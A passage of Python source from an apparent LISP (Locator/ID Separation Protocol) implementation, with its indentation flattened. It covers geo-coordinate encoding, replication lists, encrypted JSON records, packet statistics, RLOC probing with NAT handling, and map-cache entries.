dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = geopy.distance.distance(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = old_div(((lat_hi << 16) | socket.ntohs(lat_ms)), 1000)
self.lat_mins = old_div(lat_secs, 60)
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = old_div(((lon_hi << 16) | socket.ntohs(lon_ms)), 1000)
self.long_mins = old_div(lon_secs, 60)
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle(object):
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json(object):
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
#
# Deal with py3.
#
if (type(string) == bytes): string = string.decode()
self.json_name = name
self.json_encrypted = False
try:
json.loads(string)
except:
lprint("Invalid JSON string: '{}'".format(string))
string = '{ "?" : "?" }'
#endtry
self.json_string = string
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON than
# store in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = list(lisp_ms_json_keys.keys())[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (self.json_name in lisp_json_list):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
if (type(value) != str): value = str(value)
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats(object):
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int(old_div((self.packet_count - last_packets),
rate_diff))
bit_rate = old_div((self.byte_count - last_bytes), rate_diff)
bit_rate = old_div((bit_rate * 8), 1000000)
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc(object):
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = lisp_get_timestamp()
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
if (rloc_record.rloc_name != None):
self.rloc_name = rloc_record.rloc_name
#endif
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < old_div(LISP_RLOC_PROBE_TTL, 2)):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < old_div(LISP_RLOC_PROBE_TTL, 2)):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping(object):
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
self.subscribed_eid = None
self.subscribed_group = None
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(old_div(ttl, 3600)) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL and if the value is greater than 10% of
# TTL, refresh entry. So that is around every 13 or 14 seconds.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (old_div(self.map_cache_ttl, 10))
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12:i+13])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
